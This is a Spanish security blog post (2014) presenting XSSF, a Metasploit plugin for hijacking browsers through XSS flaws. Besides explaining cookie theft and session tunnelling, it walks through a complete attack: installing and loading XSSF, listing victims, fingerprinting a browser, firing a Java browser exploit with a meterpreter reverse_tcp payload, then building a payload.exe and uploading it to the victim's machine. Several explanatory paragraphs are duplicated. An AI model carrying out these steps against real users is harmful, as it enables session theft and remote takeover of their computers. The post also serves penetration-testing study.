Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
▼
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
▼
junio
(Total:
8
)
- ntopng - network top next generation - analizador ...
- Tutorial - Manual SQLmap: ataques SQLi - Inyección...
- Distribuciones con Herramientas para Análisis Forense
- RHEL - Red Hat Enterprise Linux 7
- XSSF - Cross Site Scripting Framework
- Ataques UDP Reflection Flood DrDoS (Inundación med...
- Wifislax 4.9 - Live-CD Auditorías Wireless
- TrueCrypt ya no es seguro
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
305
)
Malware
(
265
)
Windows
(
246
)
android
(
244
)
cve
(
237
)
tutorial
(
237
)
manual
(
222
)
software
(
206
)
hardware
(
196
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
iperf3 es la última versión del popular programa iperf para medir el ancho de banda entre dos o más equipos en red local o Internet . Es...
-
A finales del mes de agosto hablábamos de que los legisladores estadounidense habían solicitado la investigación de TP-Link . Y así, ya ten...
XSSF - Cross Site Scripting Framework
viernes, 13 de junio de 2014
|
Publicado por
el-brujo
|
Editar entrada
El Cross-Site Scripting Framework (XSSF)
es una herramienta de seguridad diseñada para convertir la tarea
de encontrar una vulnerabilidad XSS de un manera mucho más sencilla. El
proyecto tiene por objetivo demostrar los peligros reales de las
vulnerabilidades XSS y divulgarizar su explotación.
XSSF permite la creación de un canal de comunicación con el navegador específica (de una vulnerabilidad XSS) con el fin de realizar nuevos ataques. Los usuarios son libres de seleccionar los módulos existentes (un
módulo = un ataque) con el fin de orientar los navegadores específicos.
Xssf Framework permite administrar victimas de ataques XSS genéricos y persiste una conexión con dichas victimas por medio de un “loop” en javascript, el cual se encarga de enviar peticiones reversas en intervalos definidos de tiempo con el fin de ejecutar exploits contra la victima.
Para usar xssf en metasploit es necesario localizar
una aplicación vulnerable a ataques XSS, para probar y mejorar
habilidades en el campo de la seguridad en aplicaciones web, existe un
proyecto llamado DVWA (Damn Vulnerable Web Application), se trata de una
aplicación escrita en PHP y MySQL que tiene habilitadas una serie de
vulnerabilidades que permite a un profesional en seguridad, interactuar
con la aplicación y comprender mejor los posibles ataques que pueden
llevarse a cabo en aplicaciones web.
XSSF proporciona una potente API documentado, lo que facilita el desarrollo de módulos y ataques. Además, su integración en el Metasploit Framework permite a los usuarios iniciar el navegador basado MSF easilly explotar una vulnerabilidad de XSS.
La explotación de un fallo XSS dentro del navegador de la víctima podría ser la de mirar la página web en el navegador del atacante, utilizando la sesión de la víctima conectada. En la mayoría de los casos, simplemente robar la cookie víctima será suficiente para realizar esta acción.
Sin embargo, en pocos casos (intranet, red Herramientas portales, etc), la cookie no será útil para un atacante externo. Es por eso que XSSF túnnel fue creado para ayudar al atacante a ayudar a la navegación atacante en dominio afectado utilizando la sesión de la víctima.
Con XSS podemos crear un túnel que nos permitirá conectarnos a nuestra víctima desde un navegador web, la idea básica, esta en crear un túnel que sirva de proxy para establecer la comunicación entre la aplicación con la vulnerabilidad XSS explotada y el atacante pasando por medio de la victima, de esta forma es posible ejecutar algún tipo de ataque adicional sin revelar la identidad del atacante y utilizando la identidad de la victima.
La explotación de un fallo XSS dentro del navegador de la víctima podría ser la de mirar la página web en el navegador del atacante, utilizando la sesión de la víctima conectada. En la mayoría de los casos, simplemente robar la cookie víctima será suficiente para realizar esta acción.
Sin embargo, en pocos casos (intranet, red Herramientas portales, etc), la cookie no será útil para un atacante externo. Es por eso que XSSF túnnel fue creado para ayudar al atacante a ayudar a la navegación atacante en dominio afectado utilizando la sesión de la víctima.
Con XSS podemos crear un túnel que nos permitirá conectarnos a nuestra víctima desde un navegador web, la idea básica, esta en crear un túnel que sirva de proxy para establecer la comunicación entre la aplicación con la vulnerabilidad XSS explotada y el atacante pasando por medio de la victima, de esta forma es posible ejecutar algún tipo de ataque adicional sin revelar la identidad del atacante y utilizando la identidad de la victima.
La nueva versión MSF 4.6.0-dev es soportada por:
- Backtrack 5R3
- Ubuntu 12.04
- Kali 1.0
- Windows 7
Vulnerabilidades XSS (Cross Site Scripting )
- Cross Site Scripting InDirecto (Reflejado) Reflective XSS
- Cross Site Scripting Directo (Persistente)
Manual con ejemplos "XSS for fun and profit"
- Robar Cookies
- Ejecutar comandos (vía Javascript)
- Ejecutar ataques Denegación de Servicio (DDoS)
XSSF con Metasploit
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http:/xssf.googlecode.com/svn/trunk ./ --force
msfconsole
msf > load xssf Port=80
msf > help xssfResultado de los comandos disponibles:
- xssf_active_victims Muestra víctimas activas.
- xssf_add_auto_attack Añade un nuevo ataque automatizado (lanzado de forma automática en la conexión de la víctima).
- xssf_auto_attacks Muestra XSSF ataques automatizados.
- xssf_banner Prints Marco XSS bandera !
- xssf_clean_victims Limpia víctimas en la base de datos ( eliminar ataques de espera).
- xssf_exploit Lanza e introduce un módulo (que se ejecuta en uno de sus procesos ) en una víctima determinada.
- xssf_information Muestra información sobre una víctima determinada.
- xssf_log Muestra registro con un ID dado.
- xssf_logs Muestra los registros sobre una víctima determinada.
- xssf_remove_auto_attack Elimina un ataque automatizado.
- xssf_remove_victims Elimina las víctimas en la base de datos.
- xssf_restore_state Restaura el estado XSSF (víctimas , registros , etc) a partir del archivo de entrada.
- xssf_save_state Guarda estatales XSSF (víctimas , registros , etc) en el archivo de salida.
- xssf_servers Muestra todos los servidores de ataque utilizados.
- xssf_tunnel Nos proporciona un túnel entre agresor y víctima.
- xssf_urls Enumera las direcciones URL's disponibles útiles proporcionadas por XSSF.
- xssf_victims Muestra todas las víctimas
Ejemplo de una víctima que utiliza Internet Explorer 7 y una versión vulnerable de Java en Windows XP.
xssf_victims
1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES
xssf_information 1
[..]
BROWSER NAME : Internet Explorer
BROWSER VERSION : 7.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
[..]
use exploit/multi/browser/java_atomicreferencearray
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.23.200
set URIPATH xssf
set LHOST 192.168.23.200
exploit -j
jobs
Jobs
====
Id Name
– —-
0 Exploit: multi/browser/java_atomicreferencearray
xssf_exploit 1 0
[*] Searching Metasploit launched module with JobID = ’0′…
[+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
[*] Exploit execution started, press [CTRL + C] to stop it !
[+] Remaining victims to attack: [[1] (1)]
[+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ’1′
[+] Remaining victims to attack: NONE
show sessions
Active sessions
===============
Id Type Information Connection
– —- ———– ———-
1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
use exploit/multi/handler
exploit -j
upload /opt/metasploit/apps/pro/msf3/payload.exe c:
background
sessions -i 1
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.